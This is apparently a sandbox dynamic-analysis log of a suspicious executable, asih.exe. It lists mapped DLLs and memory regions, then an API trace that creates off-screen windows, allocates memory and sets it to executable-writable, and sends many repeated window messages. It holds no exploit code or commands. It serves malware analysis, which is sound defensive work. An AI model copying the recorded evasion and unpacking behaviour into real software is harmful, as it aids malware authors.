"wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1130 start_va = 0x77230000 end_va = 0x777d6fff monitored = 0 entry_point = 0x773a9e50 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1131 start_va = 0x2180000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1132 start_va = 0x1fe0000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 1133 start_va = 0x2380000 end_va = 0x26b7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1134 start_va = 0x758b0000 end_va = 0x75ad9fff monitored = 0 entry_point = 0x75a694e0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1135 start_va = 0x76d90000 end_va = 0x76e08fff monitored = 0 entry_point = 0x76da1a00 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1136 start_va = 0x77840000 end_va = 0x778c6fff monitored = 0 entry_point = 0x77882d70 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1137 start_va = 0x737a0000 end_va = 0x737c0fff monitored = 0 entry_point = 0x737aca40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1138 start_va = 0x72f70000 end_va = 0x73572fff monitored = 0 entry_point = 0x7314ae30 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1139 start_va = 0x72f40000 end_va = 0x72f62fff monitored = 0 entry_point = 0x72f48580 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\SysWOW64\\wldp.dll" (normalized: "c:\\windows\\syswow64\\wldp.dll") Region: id = 1140 start_va = 0x600000 end_va = 0x600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 1141 start_va = 0x76d40000 end_va = 0x76d84fff monitored = 0 entry_point = 0x76d57870 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1142 start_va = 0x72ac0000 end_va = 0x72ad7fff monitored = 0 entry_point = 0x72aca250 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1143 start_va = 0x620000 end_va = 0x620fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 1144 start_va = 0x630000 end_va = 0x636fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1145 start_va = 0x76590000 end_va = 0x765f2fff monitored = 0 entry_point = 0x76594b40 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1146 start_va = 0x72a90000 end_va = 0x72aa1fff monitored = 0 entry_point = 0x72a94620 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 1147 start_va = 0x750f0000 end_va = 0x751b2fff monitored = 0 entry_point = 0x75138980 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 1148 start_va = 0x20e0000 end_va = 0x211ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020e0000" filename = "" Region: id = 1149 start_va = 0x2180000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 1150 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 1151 start_va = 0x75850000 end_va = 0x7585efff monitored = 0 entry_point = 0x75854830 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1152 start_va = 0x72a30000 end_va = 0x72a81fff monitored = 0 entry_point = 0x72a39e70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 1153 start_va = 0x2120000 end_va = 0x2120fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002120000" filename = "" Region: id = 1154 start_va = 0x729f0000 end_va = 0x72a21fff monitored = 0 entry_point = 0x729fc340 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 1155 start_va = 0x729e0000 end_va = 0x729e7fff monitored = 0 entry_point = 0x729e2220 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 1156 start_va = 0x76c30000 end_va = 0x76c36fff monitored = 0 entry_point = 0x76c31d30 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1157 start_va = 0x2130000 end_va = 0x216ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002130000" filename = "" Region: id = 1158 start_va = 0x26c0000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026c0000" filename = "" Region: id = 1159 start_va = 0x2280000 end_va = 0x22bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 1160 start_va = 0x27c0000 end_va = 0x28bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 1161 start_va = 0x22c0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000022c0000" filename = "" Region: id = 1162 start_va = 0x28c0000 end_va = 0x29bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028c0000" filename = "" Region: id = 1277 start_va = 0x2300000 end_va = 0x2300fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 1278 start_va = 0x73580000 end_va = 0x73727fff monitored = 0 entry_point = 0x73601b70 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1279 start_va = 0x2310000 end_va = 0x2310fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 1280 start_va = 0x2320000 end_va = 0x2320fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 1281 start_va = 0x71760000 end_va = 0x717effff monitored = 0 entry_point = 0x71772f70 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 1282 start_va = 0x71330000 end_va = 0x71337fff monitored = 0 entry_point = 0x71331960 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\SysWOW64\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll") Region: id = 1283 start_va = 0x71340000 end_va = 0x71397fff monitored = 0 entry_point = 0x713591a0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\SysWOW64\\FWPUCLNT.DLL" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll") Region: id = 1284 start_va = 0x75fa0000 end_va = 0x75fb8fff monitored = 0 entry_point = 0x75fa93e0 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1285 start_va = 0x2330000 end_va = 0x2332fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1286 start_va = 0x2340000 end_va = 0x2346fff monitored = 0 entry_point = 0x2341a00 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1287 start_va = 0x2350000 end_va = 0x2350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1288 start_va = 0x2340000 end_va = 0x2346fff monitored = 0 entry_point = 0x2341a00 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1289 start_va = 0x2350000 end_va = 0x2350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1290 start_va = 0x2340000 end_va = 0x2346fff monitored = 0 entry_point = 0x2341a00 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1291 start_va = 0x2350000 end_va = 0x2350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1292 start_va = 0x2340000 end_va = 0x2346fff monitored = 0 entry_point = 0x2341a00 region_type = mapped_file name = "wshqos.dll" filename = "\\Windows\\SysWOW64\\wshqos.dll" (normalized: "c:\\windows\\syswow64\\wshqos.dll") Region: id = 1293 start_va = 0x2350000 end_va = 0x2350fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wshqos.dll.mui" filename = "\\Windows\\System32\\en-US\\wshqos.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\wshqos.dll.mui") Region: id = 1300 start_va = 0x29c0000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029c0000" filename = "" Region: id = 1301 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Thread: id = 71 os_tid = 0x12e8 [0280.443] GetCommandLineA () returned="\"C:\\Users\\OQXZRA~1\\AppData\\Local\\Temp\\asih.exe\" " [0280.443] GetModuleHandleA (lpModuleName=0x0) returned 0x500000 [0280.444] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x1002b [0280.463] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0280.464] RegisterClassExA (param_1=0x505218) returned 0xc11d [0280.465] CreateWindowExA (dwExStyle=0x0, lpClassName="aroka", lpWindowName="wait", dwStyle=0x40000, X=-2680, Y=-6870, nWidth=542, nHeight=485, hWndParent=0x0, hMenu=0x0, hInstance=0x500000, lpParam=0x0) [0280.976] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x24, wParam=0x0, lParam=0x19fafc) returned 0x0 [0280.979] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x81, wParam=0x0, lParam=0x19faf0) returned 0x1 [0281.004] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x83, wParam=0x0, lParam=0x19fadc) returned 0x0 [0281.015] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName="turok", dwStyle=0x10000001, X=10, Y=10, nWidth=320, nHeight=40, hWndParent=0x80064, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0281.016] GetLastError () returned 0x579 [0281.016] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x37) returned 0x0 [0281.016] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x36) returned 0xffffffff [0281.016] CreateFileA (lpFileName="last.inf" (normalized: "c:\\users\\oqxzraykm\\appdata\\local\\temp\\last.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0281.017] GetLastError () returned 0x2 [0281.017] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x40000000, X=10, Y=70, nWidth=500, nHeight=430, hWndParent=0x80064, hMenu=0x1, hInstance=0x500000, lpParam=0x0) returned 0xa0052 [0281.028] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x210, wParam=0x10001, lParam=0xa0052) returned 0x0 [0281.028] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName="turok", dwStyle=0x40000001, X=10, Y=380, nWidth=166, nHeight=34, hWndParent=0x1, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0281.029] GetLastError () returned 0x578 [0281.029] lstrcpyA (in: lpString1=0x5052b8, lpString2="Romantic" | out: lpString1="Romantic") returned="Romantic" [0281.029] CreateFontIndirectA (lplf=0x50529c) returned 0x580a08b6 [0281.029] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x505044, lParam=0x38) returned 0x0 [0281.030] MoveWindow (hWnd=0x80064, X=-3700, Y=-3080, nWidth=540, nHeight=483, bRepaint=0) [0281.030] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x46, wParam=0x0, lParam=0x19f844) returned 0x0 [0281.030] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x24, wParam=0x0, lParam=0x19f4c4) returned 0x0 [0281.031] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x83, wParam=0x1, lParam=0x19f81c) returned 0x0 [0281.033] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x47, wParam=0x0, lParam=0x19f844) [0281.033] NtdllDefWindowProc_A (hWnd=0x80064, Msg=0x3, wParam=0x0, lParam=0xf417f194) returned 0x0 [0281.033] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x505008, lParam=0x38) returned 0x0 [0281.033] GetWindowRect (in: hWnd=0x80064, lpRect=0x19f2f4 | out: lpRect=0x19f2f4) returned 1 [0281.033] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x39) [0281.034] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x3a) [0281.034] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x3b) [0281.034] VirtualAlloc (lpAddress=0x400000, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x0 [0281.034] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x3c) [0281.034] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x5d0000 [0281.034] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x3d) [0281.034] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x5e0000 [0281.034] VirtualProtect (in: lpAddress=0x5e0000, dwSize=0x6000, flNewProtect=0x40, lpflOldProtect=0x50508e | out: lpflOldProtect=0x50508e*=0x4) returned 1 [0281.182] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x3e) [0281.182] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x0, lParam=0x579) [0281.183] SendMessageA (hWnd=0x80064, Msg=0x111, wParam=0x5052ec, lParam=0x40) [0281.183] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.183] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.183] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.183] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.183] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.184] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.185] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.186] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.195] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.195] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.195] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.196] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.197] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.198] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.199] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.200] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.201] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.202] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.202] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.202] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.213] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.214] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.215] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.216] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0281.217] SendMessageA (hWnd=0x80064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 